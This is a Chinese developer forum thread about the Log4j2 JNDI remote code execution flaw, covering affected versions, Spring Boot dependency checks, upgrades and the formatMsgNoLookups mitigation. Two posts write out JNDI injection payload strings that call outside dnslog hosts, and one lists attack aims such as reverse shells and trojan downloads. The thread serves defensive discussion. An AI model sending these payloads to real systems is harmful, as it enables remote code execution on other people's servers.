log4j2 的漏洞大家今天晚上修复吗?

漏洞参考: issues.apache.org/jira/projects/LOG4J2/issues/LOG4J2-3201?filter=allissues

点完早饭外卖被电话叫起来了修了...

log4j 有这个问题吗？

有什么 log4j2 的替代品吗

不懂信息安全。。。怎么一个 jar 包还能被攻击啊

作为脚本小子，我只关心 exp

Apache Log4j2 是一款优秀的 Java 日志框架。2021 年 11 月 24 日，阿里云安全团队向 Apache 官方报告了 Apache Log4j2 远程代码执行漏洞。由于 Apache Log4j2 某些功能存在递归解析功能，攻击者可直接构造恶意请求，触发远程代码执行漏洞。漏洞利用无需特殊配置，经阿里云安全团队验证，Apache Struts2 、Apache Solr 、Apache Druid 、Apache Flink 等均受影响。阿里云应急响应中心提醒 Apache Log4j2 用户尽快采取安全措施阻止漏洞攻击。



漏洞评级

Apache Log4j 远程代码执行漏洞 严重



影响版本

Apache Log4j 2.x <= 2.14.1



安全建议

1. 升级 Apache Log4j2 所有相关应用到最新的 log4j-2.15.0-rc1 版本，地址 https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc1

2. 升级已知受影响的应用及组件，如 srping-boot-strater-log4j2/Apache Solr/Apache Flink/Apache Druid

@ericgui #4
logback

用户只需排查 Java 应用是否引入 log4j-api , log4j-core 两个 jar 。若存在应用使用，极大可能会受到影响。
没有这俩，明天可以休息啦

springboot -> spring-boot-starter -> spring-boot-starter-logging -> log4j-to-slf4j -> log4j-api 也就是说所有 springboot 项目都会有影响？

@MonkeyJon #10 看 idea 外部库里面有 log4j-api ,但是系统用的是 logback,pom 文件也没有引入 log4j,怎么查看是哪个依赖带的?

哪位彦祖讲一下，一个 jar 包怎么被攻击？

@aoizz #12
IDEA 、maven ，control + `+号`，所有依赖 tree 形式列出来了。

想看的东西在这

Apache log4j2 在 2.0 至 2.14.1 版本均受影响。 好像我们用的还是 1.x 的版本[doge]

@aoizz #12 你这不都把答案说出来了吗。。。。logback 依赖 log4j 啊

利用的方式以前就存在了 https://securityonline.info/jndi-injection-exploit-exploit-jndi-injection-vulnerability/

打开 IDEA ，搜一下 log4j ，用的是 1.X 的版本，继续摸鱼

@play78 #11 可以看一下项目 maven 依赖 我看 springboot 2.x 默认使用的不是 log4j

@justs0o 最新消息： https://mp.weixin.qq.com/s/AuBchaUvFw2pisVw6rNX5A

Apache Log4j 2.15.0-rc1 版本存在漏洞绕过，请及时更新至 Apache Log4j 2.15.0-rc2 版本

@play78 不是吧 我记得 springboot 默认日志不是 slf4j + logback 么

加了环境变量了，不知道顶不顶得住。

@learningman 谁告诉你 logback 依赖 log4j 的？

@jinzhongyuan #13 通俗点说一下问题

一般代码里会记录请求参数 如登录时记录 log.info("user:{} is login", name); 这个 name 是前台传过来的参数

如果前台传的是构造的参数如： ${jndi:ldap://xxxx.dnslog.cn/exp}

exp 返回的是一个构造方法里执行 shell 代码的 class 文件

然后你设置的什么命令服务器接收到参数后就执行这个命令了

@MonkeyJon #10 spring-boot-starter-web 里面排除 log4j-to-slf4j 就好了

@aoizz 应该是

@aoizz ... 麻了，那家公司只有一个后端的，几十个工程都要处理

@arthas2234 log4j1.x 版本也可能有问题
参考 https://github.com/apache/logging-log4j2/pull/608#issuecomment-990494126

@ixx 👍
感谢大佬，好像懂了

@wbd31 没用配置 jms appender ，应该就没有影响吧

@wbd31 https://github.com/apache/logging-log4j2/pull/608#issuecomment-990504842

@RuzZ 根据 quote 的内容，log4j1.x 不支持 lookup ，也找不到 JNDI 的相关引用，感觉是可以理解为 log4j 1.x 不受此次 bug 的影响

可以通过关闭日志暂时屏蔽问题么？

大厂加油

哈哈哈，非 java boy 开心吃瓜

@RuzZ #34 后续来了，1.x 也受影响。https://github.com/apache/logging-log4j2/pull/608#issuecomment-990494126

@wbd31 不会吧，现在蔓延到 1.x 了么，不过我负责的项目是在内网的，还可以观望一下

@arthas2234 让网管在防火墙上把 ldap 协议禁止了。估计还可以继续苟。

苹果云应为这个漏洞被搞了吗，一直登录不了

@play78 ldap 只是一种利用手段的演示而已，rmi 的方法多了去了

快速验证是否有这个问题： https://issues.apache.org/jira/browse/LOG4J2-3202
修复措施：直接升级到 2.15.0 版本
临时修复措施： 增加 log4j2.component.properties 配置文件，配置为 log4j2.formatMsgNoLookups=true

没有过哎

用的 springboot 、也看了 mvn 仓库没有、这个咋更新
```pom
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-log4j2</artifactId>
</dependency>
```

是 log4j2 有问题还是 log4j 都有这个问题？

没人说说刚发布的版本怎么编译打包吗？

@sha851092391 log4j2.formatMsgNoLookups 这个配置只有在 2.10.0 之后的版本才生效。

@ivancai log4j2 就是 log4j 的 2.x 版本，artifact 就是 log4j

官方真急了，禁用了这个功能，把开关都去掉了，官网文档也找不到这个配置项了

@NULL2020 我先用着 2.15.0 顶着 aliyun 库有

@NULL2020
官方文档，可以参考一下
https://logging.apache.org/log4j/2.x/build.html

@NULL2020
https://repo.maven.apache.org/maven2/org/apache/logging/log4j/log4j-api/2.15.0/

@janda
maven 更新：

<!--Log4j-->
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-core</artifactId>
<version>2.15.0</version>
</dependency>
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-api</artifactId>
<version>2.15.0</version>
</dependency>

官网的 2.15.0 是 RC2 版本么

@pocketz #52 没用，报错


@issakchill #51 我在阿里仓库网站上能搜索到，但 idea 下载不了

@adamwhite 日志可不能随便关啊，出了问题日志是 debug 的最重要的依据之一，不能因噎废食

确定 log4j-api 也受影响吗，我这边通过尝试构建攻击参数，并未能复现注入攻击。
而 2.14.1 上，的确可以让记录日志的时候，注入远程执行。

1.7 版本没事吧

@NULL2020 你看错了吧？阿里云仓库里目前能搜得到的是非官方的，groupId 不一样的，大小都差很远，不敢用。

${jndi:ldap://00pfh9.dnslog.cn}

@jamzhou 你复现注入执行的时候，是用的 log4j 的什么包

源码编译步骤：
1.准备 JDK8 & JDK11 & maven
2.配置环境变量 export JAVA_HOME_8_X64=jdk8 目录 export JAVA_HOME_11_X64=jdk11 目录
3.源码目录下执行 mvn package -Dmaven.test.skip=true -DtrimStackTrace=false -Dmaven.test.failure.ignore=true -Dsurefire.rerunFailingTestsCount=1 --global-toolchains .github/workflows/maven-toolchains.xml

@NULL2020
你报错信息是什么？我这边报错是远程 repo 里没有 log4j-api-java9 。

把源码里的 log4j-api-java9 添加到我本地的 repo 里，log4j-api 就编译成功了

有人讲讲通过这个漏洞可以做什么样的吗？

正在搞

@donespeak 远程命令执行，好点的远程下载木马，反弹 shell,坏点的，rm -r root 一下

那个……如果是 linux 上，用一个很低的权限(只有 web 文件夹有读权限)的帐户运行程序，是不是就没事儿了？

@donespeak 大概就是攻击者想执行什么代码就可以执行什么代码

@ericgui logback

@deadofpeople 我比了下源码 2.15.0 应该就是 RC2 版
https://github.com/apache/logging-log4j2/compare/log4j-2.15.0-rc1...log4j-2.15.0-rc2

@yangyaofei 考虑下内网有没有别的服务（
比如数据库

还有就是即使啥权限没有，也能挖矿

今天修复了一天。

@sshang 我用的 2.14.1

<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-core</artifactId>
<version>2.14.1</version>
</dependency>
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-api</artifactId>
<version>2.14.1</version>
</dependency>

Spring 里面默认用的 logback+slf4j ，然后 log4j api 只是个 api ，log4j-to-slf4j 只是让调用 log4j 的代码不变，背后实际调用的是 slf4j 吧

总结下来就是 Spring 默认情况下不存在这个漏洞

@jamzhou
@aoizz
@aoizz
@play78

今天看隔壁修了一天，还好我们这边没 Java

@hallDrawnel #76 依赖的基础设施如果有用到的话也一样要修的，比如 kafka, elasticsearch

@ericFork 是的，但是那个有其他团队负责修，我们只需要观察稳定性就行了

@MonkeyJon springboot 自己引入的这个两个包，但是项目上没有使用，有影响吗

高版本 JDK 不用太担心
com.sun.jndi.rmi.object.trustURLCodebase 这个参数没有设置为 true ，不会远程加载 class, 会抛出异常

@vincent956 #79 springboot 默认是没有影响的

参考 https://spring.io/blog/2021/12/10/log4j2-vulnerability-and-spring-boot spring-boot-starter-logging 包中的 log4j-to-slf4j 与 log4j-api 不受漏洞影响，只有 log4j-core 受影响